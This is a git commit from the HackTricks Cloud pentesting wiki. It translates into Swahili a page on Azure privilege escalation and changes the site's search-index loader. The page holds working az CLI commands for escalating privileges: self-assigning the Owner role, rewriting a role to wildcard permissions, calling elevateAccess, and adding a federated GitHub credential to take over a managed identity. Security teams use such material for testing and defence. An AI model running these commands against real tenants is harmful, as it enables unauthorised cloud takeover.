Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

2026-02-05 11:26:11 -08:00 · 2025-04-21 21:02:19 +00:00
parent 44c74885fd
commit 5b3993dbe6
4 changed files with 72 additions and 46 deletions
--- a/searchindex.json
+++ b/searchindex.json
--- a/src/images/venacus-logo.png
+++ b/src/images/venacus-logo.png
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
@@ -4,7 +4,7 @@

 ## Azure IAM

-Fore more information check:
+Kwa maelezo zaidi angalia:

 {{#ref}}
 ../az-services/az-azuread.md
@@ -12,45 +12,40 @@ Fore more information check:

 ### Microsoft.Authorization/roleAssignments/write

-This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role:
-
+Ruhusa hii inaruhusu kupewa majukumu kwa wahusika juu ya upeo maalum, ikimruhusu mshambuliaji kupandisha hadhi kwa kujipatia jukumu lenye mamlaka zaidi:
 ```bash
 # Example
 az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"
 ```
-
 ### Microsoft.Authorization/roleDefinitions/Write

-This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned.
-
-Create the file `role.json` with the following **content**:
+Ruhusa hii inaruhusu kubadilisha ruhusa zilizotolewa na jukumu, ikimruhusu mshambuliaji kupandisha hadhi kwa kutoa ruhusa zaidi kwa jukumu aliloteua.

+Unda faili `role.json` yenye **maudhui** yafuatayo:
 ```json
 {
-  "Name": "<name of the role>",
-  "IsCustom": true,
-  "Description": "Custom role with elevated privileges",
-  "Actions": ["*"],
-  "NotActions": [],
-  "DataActions": ["*"],
-  "NotDataActions": [],
-  "AssignableScopes": ["/subscriptions/<subscription-id>"]
+"roleName": "<name of the role>",
+"Name": "<name of the role>",
+"IsCustom": true,
+"Description": "Custom role with elevated privileges",
+"Actions": ["*"],
+"NotActions": [],
+"DataActions": ["*"],
+"NotDataActions": [],
+"AssignableScopes": ["/subscriptions/<subscription-id>"],
+"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
 }
 ```
-
-Then update the role permissions with the previous definition calling:
-
+Kisha sasisha ruhusa za jukumu kwa ufafanuzi wa awali ukitumia:
 ```bash
 az role definition update --role-definition role.json
 ```
-
 ### Microsoft.Authorization/elevateAccess/action

-This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.
+Ruhusa hizi zinaruhusu kuinua mamlaka na kuwa na uwezo wa kutoa ruhusa kwa mtu yeyote kwa rasilimali za Azure. Imeandaliwa kutolewa kwa Wasimamizi wa Kimataifa wa Entra ID ili waweze pia kusimamia ruhusa juu ya rasilimali za Azure.

 > [!TIP]
-> I think the user need to be Global Administrator in Entrad ID for the elevate call to work.
-
+> Nadhani mtumiaji anahitaji kuwa Msimamizi wa Kimataifa katika Entra ID ili wito wa kuinua ufanye kazi.
 ```bash
 # Call elevate
 az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"
@@ -58,27 +53,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au
 # Grant a user the Owner role
 az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"
 ```
-
 ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

-This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**.
-
-Example command to give access to a repo in Github to the a managed identity:
+Ruhusa hii inaruhusu kuongeza akreditivu za Shirikisho kwa utambulisho unaosimamiwa. Mfano, kutoa ufikiaji kwa Github Actions katika repo kwa utambulisho unaosimamiwa. Kisha, inaruhusu **kufikia utambulisho wowote unaosimamiwa ulioelezwa na mtumiaji**.

+Mfano wa amri ya kutoa ufikiaji kwa repo katika Github kwa utambulisho unaosimamiwa:
 ```bash
 # Generic example:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

 # Example with specific data:
 az rest --method PUT \
-  --uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
-  --headers "Content-Type=application/json" \
-  --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
+--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
+--headers "Content-Type=application/json" \
+--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
--- a/theme/ht_searcher.js
+++ b/theme/ht_searcher.js
@@ -471,16 +471,53 @@ window.search = window.search || {};
        showResults(true);
    }

-    var branch = lang === "en" ? "master" : lang
-    fetch(`https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.json`)
-        .then(response => response.json())
-        .then(json => init(json))        
-        .catch(error => { // Try to load searchindex.js if fetch failed
-            var script = document.createElement('script');
-            script.src = `https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.js`;
-            script.onload = () => init(window.search);
-            document.head.appendChild(script);
-        });
+    (async function loadSearchIndex(lang = window.lang || "en") {
+        const branch  = lang === "en" ? "master" : lang;
+        const rawUrl  =
+          `https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/refs/heads/${branch}/searchindex.js`;
+        const localJs = "/searchindex.js";
+        const TIMEOUT_MS = 5_000;
+      
+        /* helper: inject a <script src=…> and wait for it */
+        const injectScript = (src) =>
+          new Promise((resolve, reject) => {
+            const s   = document.createElement("script");
+            s.src     = src;
+            s.onload  = () => resolve(src);
+            s.onerror = (e) => reject(e);
+            document.head.appendChild(s);
+          });
+      
+        try {
+          /* 1 — download raw JS from GitHub */
+          const controller = new AbortController();
+          const timer      = setTimeout(() => controller.abort(), TIMEOUT_MS);
+      
+          const res  = await fetch(rawUrl, { signal: controller.signal });
+          clearTimeout(timer);
+          if (!res.ok) throw new Error(`HTTP ${res.status}`);
+      
+          /* 2 — wrap in a Blob so the browser sees application/javascript */
+          const code     = await res.text();
+          const blobUrl  = URL.createObjectURL(
+                            new Blob([code], { type: "application/javascript" })
+                          );
+      
+          /* 3 — execute it */
+          await injectScript(blobUrl);
+          return init(window.search);
+        } catch (eRemote) {
+          console.warn("Remote JS failed →", eRemote);
+        }
+      
+        /* ───────── fallback: local copy ───────── */
+        try {
+          await injectScript(localJs);
+          return init(window.search);
+        } catch (eLocal) {
+          console.error("Local JS failed →", eLocal);
+        }
+      })();

    // Exported functions
    search.hasFocus = hasFocus;